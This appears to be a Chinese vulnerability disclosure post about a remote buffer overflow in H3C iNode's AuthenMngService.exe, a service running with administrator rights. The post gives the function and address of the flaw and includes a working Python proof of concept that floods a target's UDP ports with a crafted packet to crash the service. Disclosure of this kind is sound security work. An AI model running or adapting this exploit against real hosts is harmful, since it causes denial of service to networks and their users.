H3C iNode是杭州华三通信技术有限公司设计开发的一款用于用户认证上网的管理软件,该软件存在缓冲区溢出漏洞,攻击者可以远程发送攻击数据包,触发漏洞溢出,导致拒绝服务,
iNode远程缓冲区溢出拒绝服务0Day
。该漏洞存在于iNode软件安装后的AuthenMngService.exe文件中,它被注册为一个服务程序,以管理员权限运行,可接收网络上发送的udp数据包。以最新版iNode PC 5.2 (E0402)为例,漏洞位置在IDA反汇编结果的sub_459F10函数中,漏洞位置为0x45A2E2处的内存拷贝函数,如图
拷贝数据长度字段可控,通过畸形数据就能导致远程拒绝服务攻击。
poc.py代码如下:
import socketimport timeExploit_addr = raw_input( "input attack ip addr : " )s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)exploit_data='\x00\x01'+'A'*14+'\x74\x02\x64\x72\x1D\xA7\x9C\xC1\xBF\xBA\x86\x4C\x57\xEF\xCB\x78' + '\x3D\x01\x01\x11\x01' for port in range( 1024 , 65535):address = ( Exploit_addr , port )s.sendto( exploit_data , address )print 'port : ' , porttime.sleep(0.001)s.close()print 'Exploit End'raw_input()
同之前提交的漏洞(http:///Article/201307/227180.html),